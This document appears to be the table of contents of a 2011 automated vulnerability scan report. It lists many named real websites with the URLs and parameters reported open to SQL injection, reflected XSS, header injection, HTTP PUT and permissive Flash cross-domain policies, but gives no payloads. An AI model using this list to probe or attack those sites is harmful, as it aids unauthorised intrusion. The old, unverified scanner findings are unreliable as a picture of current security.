XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05042011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Wed May 04 10:46:35 CDT 2011.

1. SQL injection

1.1. http://beam.to/favicon.ico [REST URL parameter 1]

1.2. http://beam.to/favicon.ico [name of an arbitrarily supplied request parameter]

1.3. http://beam.to/index.asp [REST URL parameter 1]

1.4. http://beam.to/login.asp [REST URL parameter 1]

1.5. http://beam.to/start.asp [REST URL parameter 1]

1.6. http://tracking.moon-ray.com/track.php [s parameter]

1.7. http://tracking.moon-ray.com/track.php [sess_ cookie]

1.8. http://tracking.moon-ray.com/track.php [t parameter]

1.9. http://www.acamnet.org/favicon.ico [Referer HTTP header]

1.10. http://www.acamnet.org/favicon.ico [User-Agent HTTP header]

1.11. http://www.beam.to/ [name of an arbitrarily supplied request parameter]

1.12. http://www.beam.to/favicon.ico [REST URL parameter 1]

1.13. http://www.beam.to/favicon.ico [name of an arbitrarily supplied request parameter]

1.14. http://www.bustthebillstack.com/favicon.ico [REST URL parameter 1]

1.15. http://www.findcoinprices.info/favicon.ico [User-Agent HTTP header]

1.16. http://www.henryfields.com/favicon.ico [REST URL parameter 1]

1.17. http://www.mybusinesslisting.com/favicon.ico [REST URL parameter 1]

1.18. http://www.mybusinesslisting.com/favicon.ico [Referer HTTP header]

1.19. http://www.mybusinesslisting.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.20. http://www.scrapblog.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.21. http://www.thumb-store.com/favicon.ico [Referer HTTP header]

1.22. http://www.truewoman.com/ [id parameter]

1.23. http://www.truewoman.com/favicon.ic [REST URL parameter 1]

1.24. http://www.truewoman.com/favicon.ic [name of an arbitrarily supplied request parameter]

1.25. http://www.truewoman.com/favicon.ico [REST URL parameter 1]

1.26. http://www.truewoman.com/index.php [REST URL parameter 1]

1.27. http://www.truewoman.com/index.php [id parameter]

2. ASP.NET tracing enabled

2.1. http://www.endlessvacation.com/trace.axd

2.2. http://www.motion-vr.net/trace.axd

2.3. http://www.pledge.com/trace.axd

2.4. http://www.woodworking.com/trace.axd

3. XPath injection

4. HTTP PUT enabled

4.1. http://www.gradtoday.com/favicon.ico

4.2. http://www.thenursingscholars.com/favicon.ico

5. HTTP header injection

5.1. http://www.blogcindario.com/favicon.ico [REST URL parameter 1]

5.2. http://www.freeonlinejobsathome.com/favicon.ico [REST URL parameter 1]

5.3. http://www.freestuff4free.com/favicon.ico [REST URL parameter 1]

5.4. http://www.gatewaync.com/favicon.ico [REST URL parameter 1]

5.5. http://www.gunsholstersandgear.com/favicon.ico [REST URL parameter 1]

5.6. http://www.lifeaftertheoilcrash.net/favicon.ico [REST URL parameter 1]

5.7. http://www.onlinepublicrecordssearch.com/favicon.ico [REST URL parameter 1]

5.8. http://www.powertrainproducts.net/favicon.ico [REST URL parameter 1]

5.9. http://www.schools.org/favicon.ico [REST URL parameter 1]

5.10. http://www.verifiedworkathome.com/favicon.ico [REST URL parameter 1]

5.11. http://www.wow-pro.com/favicon.ico [REST URL parameter 1]

6. Cross-site scripting (reflected)

6.1. http://4qinvite.4q.iperceptions.com/1.aspx [name of an arbitrarily supplied request parameter]

6.2. http://4qinvite.4q.iperceptions.com/1.aspx [sdfc parameter]

6.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

6.4. http://admeld.adnxs.com/usersync [admeld_callback parameter]

6.5. http://api-public.addthis.com/url/shares.json [callback parameter]

6.6. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json [callback parameter]

6.7. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]

6.8. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]

6.9. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]

6.10. http://js.revsci.net/gateway/gw.js [csid parameter]

6.11. http://km6633.keymetric.net/KM2.js [hist parameter]

6.12. http://km6633.keymetric.net/KM2.js [lag parameter]

6.13. http://km6633.keymetric.net/KM2.js [las parameter]

6.14. http://km6633.keymetric.net/KM2.js [lc1 parameter]

6.15. http://km6633.keymetric.net/KM2.js [lc2 parameter]

6.16. http://km6633.keymetric.net/KM2.js [lc3 parameter]

6.17. http://km6633.keymetric.net/KM2.js [lc4 parameter]

6.18. http://km6633.keymetric.net/KM2.js [lc5 parameter]

6.19. http://km6633.keymetric.net/KM2.js [lca parameter]

6.20. http://km6633.keymetric.net/KM2.js [lmt parameter]

6.21. http://km6633.keymetric.net/KM2.js [rho parameter]

6.22. http://km6633.keymetric.net/KM2.js [rqu parameter]

6.23. http://km6633.keymetric.net/KM2.js [vid parameter]

6.24. http://km6633.keymetric.net/KMGCnew.js [disp parameter]

6.25. http://km6633.keymetric.net/KMGCnew.js [pat parameter]

6.26. http://mads.cnet.com/mac-ad [ADREQ&beacon parameter]

6.27. http://mads.cnet.com/mac-ad [ATTR parameter]

6.28. http://mads.cnet.com/mac-ad [BRAND parameter]

6.29. http://mads.cnet.com/mac-ad [BRAND parameter]

6.30. http://mads.cnet.com/mac-ad [CARRIER parameter]

6.31. http://mads.cnet.com/mac-ad [CELT parameter]

6.32. http://mads.cnet.com/mac-ad [CID parameter]

6.33. http://mads.cnet.com/mac-ad [CNET-PAGE-GUID parameter]

6.34. http://mads.cnet.com/mac-ad [COOKIE%3AANON_ID parameter]

6.35. http://mads.cnet.com/mac-ad [DVAR_INSTLANG parameter]

6.36. http://mads.cnet.com/mac-ad [GLOBAL&CLIENT:ID parameter]

6.37. http://mads.cnet.com/mac-ad [MFG parameter]

6.38. http://mads.cnet.com/mac-ad [NCAT parameter]

6.39. http://mads.cnet.com/mac-ad [NODE parameter]

6.40. http://mads.cnet.com/mac-ad [OS parameter]

6.41. http://mads.cnet.com/mac-ad [PAGESTATE parameter]

6.42. http://mads.cnet.com/mac-ad [PAGESTATE parameter]

6.43. http://mads.cnet.com/mac-ad [PTYPE parameter]

6.44. http://mads.cnet.com/mac-ad [SITE parameter]

6.45. http://mads.cnet.com/mac-ad [SITE parameter]

6.46. http://mads.cnet.com/mac-ad [_RGROUP parameter]

6.47. http://mads.cnet.com/mac-ad [cookiesOn parameter]

6.48. http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter]

6.49. http://mads.cnet.com/mac-ad [x-cb parameter]

6.50. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

6.51. http://tracking.moon-ray.com/track.php [t parameter]

6.52. http://www.autism-society.org/favicon.ico [REST URL parameter 1]

6.53. http://www.bestbedguide.com/favicon.ico [REST URL parameter 1]

6.54. http://www.courts.info/favicon.ico [REST URL parameter 1]

6.55. http://www.courts.info/favicon.ico [name of an arbitrarily supplied request parameter]

6.56. http://www.craigslists.com/favicon.ico [REST URL parameter 1]

6.57. http://www.craigslists.com/favicon.ico [REST URL parameter 1]

6.58. http://www.craigslists.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.59. http://www.craigslists.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.60. http://www.electroluxappliances.com/favicon.ico [REST URL parameter 1]

6.61. http://www.flwoutdoors.com/favicon.ico [REST URL parameter 1]

6.62. http://www.gemvara.com/favicon.ico [REST URL parameter 1]

6.63. http://www.homegauge.com/favicon.ico [REST URL parameter 1]

6.64. http://www.jif.com/favicon.ico [REST URL parameter 1]

6.65. http://www.kennedyspacecenter.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.66. http://www.mpsaz.org/favicon.ico [REST URL parameter 1]

6.67. http://www.musi-c-lips.com/favicon.ico [REST URL parameter 1]

6.68. http://www.musi-c-lips.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.69. http://www.okdhs.org/favicon.ico [REST URL parameter 1]

6.70. http://www.okdhs.org/favicon.ico [name of an arbitrarily supplied request parameter]

6.71. http://www.okdhs.org/favicon.ico [name of an arbitrarily supplied request parameter]

6.72. http://www.quantumjumping.com/contact [REST URL parameter 1]

6.73. http://www.quantumjumping.com/contact/view [REST URL parameter 1]

6.74. http://www.quantumjumping.com/contact/view [REST URL parameter 2]

6.75. http://www.quantumjumping.com/contact/view [title parameter]

6.76. http://www.quantumjumping.com/customers/support/article [REST URL parameter 1]

6.77. http://www.quantumjumping.com/customers/support/article [REST URL parameter 2]

6.78. http://www.quantumjumping.com/customers/support/article [REST URL parameter 3]

6.79. http://www.quantumjumping.com/favicon.ico [REST URL parameter 1]

6.80. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 1]

6.81. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 2]

6.82. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 3]

6.83. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 4]

6.84. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 5]

6.85. http://www.quantumjumping.com/media/themes/images/a/call.png [name of an arbitrarily supplied request parameter]

6.86. http://www.quantumjumping.com/products [REST URL parameter 1]

6.87. http://www.quantumjumping.com/products [name of an arbitrarily supplied request parameter]

6.88. http://www.rapidmaniac.com/favicon.ico [REST URL parameter 1]

6.89. http://www.reflector.com/favicon.ico [REST URL parameter 1]

6.90. http://www.royal.gov.uk/favicon.ico [name of an arbitrarily supplied request parameter]

6.91. http://www.sbc.net/favicon.ico [REST URL parameter 1]

6.92. http://www.silvalifesystem.com/favicon.ico [REST URL parameter 1]

6.93. http://www.smokin4free.com/favicon.ico [REST URL parameter 1]

6.94. http://www.sothebysrealty.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.95. http://www.sourcingmap.com/favicon.ico [REST URL parameter 1]

6.96. http://www.sweet-babies.ws/favicon.ico [name of an arbitrarily supplied request parameter]

6.97. http://www.swiftpage5.com/favicon.ico [REST URL parameter 1]

6.98. http://www.swiftpage5.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.99. http://www.swiftpage7.com/favicon.ico [REST URL parameter 1]

6.100. http://www.swiftpage7.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.101. http://www.swiftpage8.com/favicon.ico [REST URL parameter 1]

6.102. http://www.swiftpage8.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.103. http://www.theamericanmonk.com/favicon.ico [REST URL parameter 1]

6.104. http://www.theamericanmonk.com/members/forgot-password [REST URL parameter 1]

6.105. http://www.uww.edu/favicon.ico [name of an arbitrarily supplied request parameter]

6.106. http://www.wine.com/favicon.ico [REST URL parameter 1]

6.107. http://www.courts.info/favicon.ico [Referer HTTP header]

6.108. http://www.courts.info/favicon.ico [User-Agent HTTP header]

6.109. http://www.democratsenators.org/favicon.ico [Referer HTTP header]

6.110. http://www.democratsenators.org/favicon.ico [Referer HTTP header]

6.111. http://www.jpeterman.com/favicon.ico [User-Agent HTTP header]

6.112. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf [meld_sess cookie]

6.113. http://tracking.moon-ray.com/track.php [sess_ cookie]

6.114. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]

6.115. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.116. http://www.pilotpentennis.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.117. http://www.pilotpentennis.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.118. http://www.safecu.org/favicon.ico [REST URL parameter 1]

6.119. http://www.safecu.org/favicon.ico [name of an arbitrarily supplied request parameter]

7. Flash cross-domain policy

7.1. http://ad.doubleclick.net/crossdomain.xml

7.2. http://admeld.adnxs.com/crossdomain.xml

7.3. http://api.facebook.com/crossdomain.xml

7.4. http://b.scorecardresearch.com/crossdomain.xml

7.5. http://cspix.media6degrees.com/crossdomain.xml

7.6. http://external.ak.fbcdn.net/crossdomain.xml

7.7. http://js.revsci.net/crossdomain.xml

7.8. http://ping.crowdscience.com/crossdomain.xml

7.9. http://pix04.revsci.net/crossdomain.xml

7.10. http://pixel.33across.com/crossdomain.xml

7.11. http://pixel.invitemedia.com/crossdomain.xml

7.12. http://pixel.quantserve.com/crossdomain.xml

7.13. http://secure-us.imrworldwide.com/crossdomain.xml

7.14. http://static.crowdscience.com/crossdomain.xml

7.15. http://tags.bluekai.com/crossdomain.xml

7.16. http://tcr.tynt.com/crossdomain.xml

7.17. http://tracking.mediabarons.net/crossdomain.xml

7.18. http://trk.kissmetrics.com/crossdomain.xml

7.19. http://www.1065.com/crossdomain.xml

7.20. http://www.3news.co.nz/crossdomain.xml

7.21. http://www.5ilthy.com/crossdomain.xml

7.22. http://www.7k7k.com/crossdomain.xml

7.23. http://www.98rock.com/crossdomain.xml

7.24. http://www.abc.es/crossdomain.xml

7.25. http://www.adammesh.com/crossdomain.xml

7.26. http://www.adidasgolf.com/crossdomain.xml

7.27. http://www.aggieathletics.com/crossdomain.xml

7.28. http://www.allamericanblogger.com/crossdomain.xml

7.29. http://www.alltrailers.net/crossdomain.xml

7.30. http://www.ally.ca/crossdomain.xml

7.31. http://www.amplify.com/crossdomain.xml

7.32. http://www.arkansasrazorbacks.com/crossdomain.xml

7.33. http://www.ask-oracle.com/crossdomain.xml

7.34. http://www.babepond.com/crossdomain.xml

7.35. http://www.bahamas.com/crossdomain.xml

7.36. http://www.betterflashgames.com/crossdomain.xml

7.37. http://www.blastcasta.com/crossdomain.xml

7.38. http://www.blick.ch/crossdomain.xml

7.39. http://www.bloodytrailers.com/crossdomain.xml

7.40. http://www.breederscup.com/crossdomain.xml

7.41. http://www.buitoni.com/crossdomain.xml

7.42. http://www.canvaspeople.com/crossdomain.xml

7.43. http://www.cartoonnetworkasia.com/crossdomain.xml

7.44. http://www.cayenne.com/crossdomain.xml

7.45. http://www.channel933.com/crossdomain.xml

7.46. http://www.charlestoncvb.com/crossdomain.xml

7.47. http://www.chiq.com/crossdomain.xml

7.48. http://www.chnlove.com/crossdomain.xml

7.49. http://www.chobani.com/crossdomain.xml

7.50. http://www.cities97.com/crossdomain.xml

7.51. http://www.clubbk.com/crossdomain.xml

7.52. http://www.collegeotr.com/crossdomain.xml

7.53. http://www.corridorcareers.com/crossdomain.xml

7.54. http://www.crabtree-evelyn.com/crossdomain.xml

7.55. http://www.cubuffs.com/crossdomain.xml

7.56. http://www.cycling.tv/crossdomain.xml

7.57. http://www.cyclones.com/crossdomain.xml

7.58. http://www.dctheatrescene.com/crossdomain.xml

7.59. http://www.deanzadrivein.com/crossdomain.xml

7.60. http://www.details.com/crossdomain.xml

7.61. http://www.diamondshark.com/crossdomain.xml

7.62. http://www.diesel.com/crossdomain.xml

7.63. http://www.do512.com/crossdomain.xml

7.64. http://www.doverpost.com/crossdomain.xml

7.65. http://www.ecademy.com/crossdomain.xml

7.66. http://www.evanovich.com/crossdomain.xml

7.67. http://www.evaphone.com/crossdomain.xml

7.68. http://www.eveningtribune.com/crossdomain.xml

7.69. http://www.evilhub.com/crossdomain.xml

7.70. http://www.fareguru.com/crossdomain.xml

7.71. http://www.findyourselfinit.com/crossdomain.xml

7.72. http://www.fiserv.com/crossdomain.xml

7.73. http://www.flashedition.com/crossdomain.xml

7.74. http://www.flashflashrevolution.com/crossdomain.xml

7.75. http://www.fluor.com/crossdomain.xml

7.76. http://www.focus.de/crossdomain.xml

7.77. http://www.foreclosureradar.com/crossdomain.xml

7.78. http://www.fox10tv.com/crossdomain.xml

7.79. http://www.fox19.com/crossdomain.xml

7.80. http://www.foxtoledo.com/crossdomain.xml

7.81. http://www.freedownloads.be/crossdomain.xml

7.82. http://www.ftv.com/crossdomain.xml

7.83. http://www.gamesforgirlsclub.com/crossdomain.xml

7.84. http://www.gamevial.com/crossdomain.xml

7.85. http://www.garnier.com/crossdomain.xml

7.86. http://www.gartnerstudios.com/crossdomain.xml

7.87. http://www.geckobyte.com/crossdomain.xml

7.88. http://www.gelaskins.com/crossdomain.xml

7.89. http://www.goomradio.com/crossdomain.xml

7.90. http://www.hanestravelincomfort.com/crossdomain.xml

7.91. http://www.hannibal.net/crossdomain.xml

7.92. http://www.heels.com/crossdomain.xml

7.93. http://www.holtorfmed.com/crossdomain.xml

7.94. http://www.hotdog.hu/crossdomain.xml

7.95. http://www.house365.com/crossdomain.xml

7.96. http://www.howdini.com/crossdomain.xml

7.97. http://www.hrs.com/crossdomain.xml

7.98. http://www.hugo.com/crossdomain.xml

7.99. http://www.instaproofs.com/crossdomain.xml

7.100. http://www.izlesene.com/crossdomain.xml

7.101. http://www.japanesematures.com/crossdomain.xml

7.102. http://www.jasonaldean.com/crossdomain.xml

7.103. http://www.jazzradio.com/crossdomain.xml

7.104. http://www.jeuxvideo.fr/crossdomain.xml

7.105. http://www.joshgroban.com/crossdomain.xml

7.106. http://www.joydesk.com/crossdomain.xml

7.107. http://www.juicyjuice.com/crossdomain.xml

7.108. http://www.jukeboxalive.com/crossdomain.xml

7.109. http://www.jumeirah.com/crossdomain.xml

7.110. http://www.kaplancollege.com/crossdomain.xml

7.111. http://www.kcbd.com/crossdomain.xml

7.112. http://www.kcoy.com/crossdomain.xml

7.113. http://www.keegy.com/crossdomain.xml

7.114. http://www.kellymom.com/crossdomain.xml

7.115. http://www.kentuckysportsradio.com/crossdomain.xml

7.116. http://www.kfyi.com/crossdomain.xml

7.117. http://www.khow.com/crossdomain.xml

7.118. http://www.kimt.com/crossdomain.xml

7.119. http://www.kiss957.com/crossdomain.xml

7.120. http://www.kisw.com/crossdomain.xml

7.121. http://www.kivitv.com/crossdomain.xml

7.122. http://www.kiwicollection.com/crossdomain.xml

7.123. http://www.kmel.com/crossdomain.xml

7.124. http://www.koamtv.com/crossdomain.xml

7.125. http://www.kost1035.com/crossdomain.xml

7.126. http://www.kstatesports.com/crossdomain.xml

7.127. http://www.laketrust.org/crossdomain.xml

7.128. http://www.leaderinsurance.com/crossdomain.xml

7.129. http://www.lifetributes.com/crossdomain.xml

7.130. http://www.limelinx.com/crossdomain.xml

7.131. http://www.ljmsite.com/crossdomain.xml

7.132. http://www.logotv.com/crossdomain.xml

7.133. http://www.m-ms.com/crossdomain.xml

7.134. http://www.marble.com/crossdomain.xml

7.135. http://www.mercadolivre.com.br/crossdomain.xml

7.136. http://www.mibcn.com/crossdomain.xml

7.137. http://www.mixbook.com/crossdomain.xml

7.138. http://www.motion-vr.net/crossdomain.xml

7.139. http://www.motorracingnetwork.com/crossdomain.xml

7.140. http://www.mygames4girls.com/crossdomain.xml

7.141. http://www.myjizztube.com/crossdomain.xml

7.142. http://www.nbcolympics.com/crossdomain.xml

7.143. http://www.netfilia.com/crossdomain.xml

7.144. http://www.oakridger.com/crossdomain.xml

7.145. http://www.opt-intelligence.com/crossdomain.xml

7.146. http://www.papayaclothing.com/crossdomain.xml

7.147. http://www.parsons.com/crossdomain.xml

7.148. http://www.paulmccartney.com/crossdomain.xml

7.149. http://www.plaindealer.com/crossdomain.xml

7.150. http://www.playingforchange.com/crossdomain.xml

7.151. http://www.playmymovs.com/crossdomain.xml

7.152. http://www.porkolt.com/crossdomain.xml

7.153. http://www.pqdvd.com/crossdomain.xml

7.154. http://www.providenceiscalling.jobs/crossdomain.xml

7.155. http://www.pushplay.com/crossdomain.xml

7.156. http://www.qualcomm.com/crossdomain.xml

7.157. http://www.quickbuyme.com/crossdomain.xml

7.158. http://www.rebubbled.com/crossdomain.xml

7.159. http://www.rewardscart.com/crossdomain.xml

7.160. http://www.secretbuilders.com/crossdomain.xml

7.161. http://www.segodnya.ua/crossdomain.xml

7.162. http://www.sharethatboy.com/crossdomain.xml

7.163. http://www.sheezyart.com/crossdomain.xml

7.164. http://www.simply.tv/crossdomain.xml

7.165. http://www.sonicretro.org/crossdomain.xml

7.166. http://www.sonicstate.com/crossdomain.xml

7.167. http://www.sparechangeinc.com/crossdomain.xml

7.168. http://www.sparkworkz.com/crossdomain.xml

7.169. http://www.staralliance.com/crossdomain.xml

7.170. http://www.superrewards-offers.com/crossdomain.xml

7.171. http://www.talkshoe.com/crossdomain.xml

7.172. http://www.teamintraining.org/crossdomain.xml

7.173. http://www.teenhollywood.com/crossdomain.xml

7.174. http://www.terabitz.com/crossdomain.xml

7.175. http://www.the-leader.com/crossdomain.xml

7.176. http://www.thefirstpost.co.uk/crossdomain.xml

7.177. http://www.tinierme.com/crossdomain.xml

7.178. http://www.trojancondoms.com/crossdomain.xml

7.179. http://www.truthin2010.org/crossdomain.xml

7.180. http://www.tv2.no/crossdomain.xml

7.181. http://www.tvb.com/crossdomain.xml

7.182. http://www.tvunetworks.com/crossdomain.xml

7.183. http://www.unb.ca/crossdomain.xml

7.184. http://www.v103.com/crossdomain.xml

7.185. http://www.veria.com/crossdomain.xml

7.186. http://www.videoboxmen.com/crossdomain.xml

7.187. http://www.virginialottery.com/crossdomain.xml

7.188. http://www.virginiasports.com/crossdomain.xml

7.189. http://www.vizury.com/crossdomain.xml

7.190. http://www.votigo.com/crossdomain.xml

7.191. http://www.vpntrack.com/crossdomain.xml

7.192. http://www.walkjogrun.net/crossdomain.xml

7.193. http://www.warcry.com/crossdomain.xml

7.194. http://www.wben.com/crossdomain.xml

7.195. http://www.wcvirtualversion.com/crossdomain.xml

7.196. http://www.wdasfm.com/crossdomain.xml

7.197. http://www.wect.com/crossdomain.xml

7.198. http://www.wego.com/crossdomain.xml

7.199. http://www.wendy4.com/crossdomain.xml

7.200. http://www.wgar.com/crossdomain.xml

7.201. http://www.wham1180.com/crossdomain.xml

7.202. http://www.wideo.fr/crossdomain.xml

7.203. http://www.wmagazine.com/crossdomain.xml

7.204. http://www.woio.com/crossdomain.xml

7.205. http://www.wor710.com/crossdomain.xml

7.206. http://www.wowtattoos.com/crossdomain.xml

7.207. http://www.wten.com/crossdomain.xml

7.208. http://www.wtvm.com/crossdomain.xml

7.209. http://www.yourdailyjournal.com/crossdomain.xml

7.210. http://www.zavers.com/crossdomain.xml

7.211. http://api.tweetmeme.com/crossdomain.xml

7.212. http://feeds.bbci.co.uk/crossdomain.xml

7.213. http://googleads.g.doubleclick.net/crossdomain.xml

7.214. http://mads.cnet.com/crossdomain.xml

7.215. http://news.cnet.com/crossdomain.xml

7.216. http://newsrss.bbc.co.uk/crossdomain.xml

7.217. http://server.iad.liveperson.net/crossdomain.xml

7.218. http://www.abenity.com/crossdomain.xml

7.219. http://www.activedayton.com/crossdomain.xml

7.220. http://www.aikenstandard.com/crossdomain.xml

7.221. http://www.alarabiya.net/crossdomain.xml

7.222. http://www.apropo.ro/crossdomain.xml

7.223. http://www.arcadefire.com/crossdomain.xml

7.224. http://www.atlanticbb.com/crossdomain.xml

7.225. http://www.aviationweek.com/crossdomain.xml

7.226. http://www.bauerfinancial.com/crossdomain.xml

7.227. http://www.bebo.com/crossdomain.xml

7.228. http://www.bigwigmedia.com/crossdomain.xml

7.229. http://www.bollywoodhungama.com/crossdomain.xml

7.230. http://www.bookreporter.com/crossdomain.xml

7.231. http://www.brainshark.com/crossdomain.xml

7.232. http://www.brandonsun.com/crossdomain.xml

7.233. http://www.brightstorm.com/crossdomain.xml

7.234. http://www.bvonmoney.com/crossdomain.xml

7.235. http://www.carpetone.com/crossdomain.xml

7.236. http://www.cc.org/crossdomain.xml

7.237. http://www.choicehotels.ca/crossdomain.xml

7.238. http://www.clearrate.com/crossdomain.xml

7.239. http://www.clintonfoundation.org/crossdomain.xml

7.240. http://www.customclassictrucks.com/crossdomain.xml

7.241. http://www.democratsenators.org/crossdomain.xml

7.242. http://www.dorlingkindersley-uk.co.uk/crossdomain.xml

7.243. http://www.drshnaps.com/crossdomain.xml

7.244. http://www.ebay.be/crossdomain.xml

7.245. http://www.elabs3.com/crossdomain.xml

7.246. http://www.electroluxappliances.com/crossdomain.xml

7.247. http://www.elnorte.com/crossdomain.xml

7.248. http://www.facebook.com/crossdomain.xml

7.249. http://www.fellowes.com/crossdomain.xml

7.250. http://www.finn.no/crossdomain.xml

7.251. http://www.flwoutdoors.com/crossdomain.xml

7.252. http://www.foofighters.com/crossdomain.xml

7.253. http://www.franktownrocks.com/crossdomain.xml

7.254. http://www.gadsdentimes.com/crossdomain.xml

7.255. http://www.gardengatemagazine.com/crossdomain.xml

7.256. http://www.globaltimes.cn/crossdomain.xml

7.257. http://www.gm.ca/crossdomain.xml

7.258. http://www.greenvalleyranchresort.com/crossdomain.xml

7.259. http://www.heise.de/crossdomain.xml

7.260. http://www.heralddemocrat.com/crossdomain.xml

7.261. http://www.hihostels.com/crossdomain.xml

7.262. http://www.holder.com.ua/crossdomain.xml

7.263. http://www.homeawayrealestate.com/crossdomain.xml

7.264. http://www.ifcj.org/crossdomain.xml

7.265. http://www.igirlsgames.com/crossdomain.xml

7.266. http://www.jaguar.com/crossdomain.xml

7.267. http://www.journal-news.com/crossdomain.xml

7.268. http://www.krcrtv.com/crossdomain.xml

7.269. http://www.ktva.com/crossdomain.xml

7.270. http://www.lastfm.es/crossdomain.xml

7.271. http://www.lastminutecruises.com/crossdomain.xml

7.272. http://www.livewellhd.com/crossdomain.xml

7.273. http://www.majman.net/crossdomain.xml

7.274. http://www.marisamiller.com/crossdomain.xml

7.275. http://www.mctennessee.com/crossdomain.xml

7.276. http://www.mediav.com/crossdomain.xml

7.277. http://www.meendo.com/crossdomain.xml

7.278. http://www.misquincemag.com/crossdomain.xml

7.279. http://www.mkt1444.com/crossdomain.xml

7.280. http://www.mkt746.com/crossdomain.xml

7.281. http://www.mnsun.com/crossdomain.xml

7.282. http://www.mtv.ca/crossdomain.xml

7.283. http://www.musclemustangfastfords.com/crossdomain.xml

7.284. http://www.mustang50magazine.com/crossdomain.xml

7.285. http://www.mustsharejokes.com/crossdomain.xml

7.286. http://www.muvids.com/crossdomain.xml

7.287. http://www.myweather.com/crossdomain.xml

7.288. http://www.netvibesbusiness.com/crossdomain.xml

7.289. http://www.newschief.com/crossdomain.xml

7.290. http://www.ningin.com/crossdomain.xml

7.291. http://www.onet.tv/crossdomain.xml

7.292. http://www.pixazza.com/crossdomain.xml

7.293. http://www.pizap.com/crossdomain.xml

7.294. http://www.playtech.com/crossdomain.xml

7.295. http://www.quickandsimple.com/crossdomain.xml

7.296. http://www.redrocklasvegas.com/crossdomain.xml

7.297. http://www.reflector.com/crossdomain.xml

7.298. http://www.rtl.de/crossdomain.xml

7.299. http://www.scarletknights.com/crossdomain.xml

7.300. http://www.scrapblog.com/crossdomain.xml

7.301. http://www.sixt.com/crossdomain.xml

7.302. http://www.sleepconnect.com/crossdomain.xml

7.303. http://www.sportrider.com/crossdomain.xml

7.304. http://www.streetrodderweb.com/crossdomain.xml

7.305. http://www.stumpsparty.com/crossdomain.xml

7.306. http://www.tagomatic.com/crossdomain.xml

7.307. http://www.tbd.com/crossdomain.xml

7.308. http://www.thaivisa.com/crossdomain.xml

7.309. http://www.thehawkeye.com/crossdomain.xml

7.310. http://www.thehenryford.org/crossdomain.xml

7.311. http://www.tna.com/crossdomain.xml

7.312. http://www.treetop.com/crossdomain.xml

7.313. http://www.ualmileageplus.com/crossdomain.xml

7.314. http://www.uniqlo.com/crossdomain.xml

7.315. http://www.universalclass.com/crossdomain.xml

7.316. http://www.usafootball.com/crossdomain.xml

7.317. http://www.vh1classic.com/crossdomain.xml

7.318. http://www.vimg.net/crossdomain.xml

7.319. http://www.visitrenotahoe.com/crossdomain.xml

7.320. http://www.webware.com/crossdomain.xml

7.321. http://www.weissresearchissues.com/crossdomain.xml

7.322. http://www.wofford.edu/crossdomain.xml

7.323. http://www.woodsmith.com/crossdomain.xml

7.324. http://www.yachtingmagazine.com/crossdomain.xml

7.325. http://api.twitter.com/crossdomain.xml

7.326. http://www.acorn-online.com/crossdomain.xml

7.327. http://www.blanchardonline.com/crossdomain.xml

7.328. http://www.bonatireview.com/crossdomain.xml

7.329. http://www.boweryballroom.com/crossdomain.xml

7.330. http://www.celebridoodle.com/crossdomain.xml

7.331. http://www.chatforfree.org/crossdomain.xml

7.332. http://www.chieftain.com/crossdomain.xml

7.333. http://www.clickvue.com/crossdomain.xml

7.334. http://www.cslplasma.com/crossdomain.xml

7.335. http://www.dailyjournalonline.com/crossdomain.xml

7.336. http://www.donga.com/crossdomain.xml

7.337. http://www.fiba.com/crossdomain.xml

7.338. http://www.fogu.com/crossdomain.xml

7.339. http://www.gnosis.org/crossdomain.xml

7.340. http://www.goac.com/crossdomain.xml

7.341. http://www.greenevillesun.com/crossdomain.xml

7.342. http://www.hamptons.com/crossdomain.xml

7.343. http://www.hanfordsentinel.com/crossdomain.xml

7.344. http://www.heraldstandard.com/crossdomain.xml

7.345. http://www.hollywoodbowl.com/crossdomain.xml

7.346. http://www.hostesscakes.com/crossdomain.xml

7.347. http://www.indianagazette.com/crossdomain.xml

7.348. http://www.jimmyjohns.com/crossdomain.xml

7.349. http://www.lomography.com/crossdomain.xml

7.350. http://www.lompocrecord.com/crossdomain.xml

7.351. http://www.marinas.com/crossdomain.xml

7.352. http://www.marlincrawler.com/crossdomain.xml

7.353. http://www.marriottvacationclub.com/crossdomain.xml

7.354. http://www.mrclean.com/crossdomain.xml

7.355. http://www.mypicturetown.com/crossdomain.xml

7.356. http://www.myrecordjournal.com/crossdomain.xml

7.357. http://www.nextgenboards.com/crossdomain.xml

7.358. http://www.nobelcom.com/crossdomain.xml

7.359. http://www.ntpapull.com/crossdomain.xml

7.360. http://www.omniture.com/crossdomain.xml

7.361. http://www.overnightprints.com/crossdomain.xml

7.362. http://www.pecentral.org/crossdomain.xml

7.363. http://www.pewforum.org/crossdomain.xml

7.364. http://www.quintura.com/crossdomain.xml

7.365. http://www.rockbet.com/crossdomain.xml

7.366. http://www.rollingout.com/crossdomain.xml

7.367. http://www.sanjuan.edu/crossdomain.xml

7.368. http://www.scholarshipprovider.net/crossdomain.xml

7.369. http://www.scientology.org/crossdomain.xml

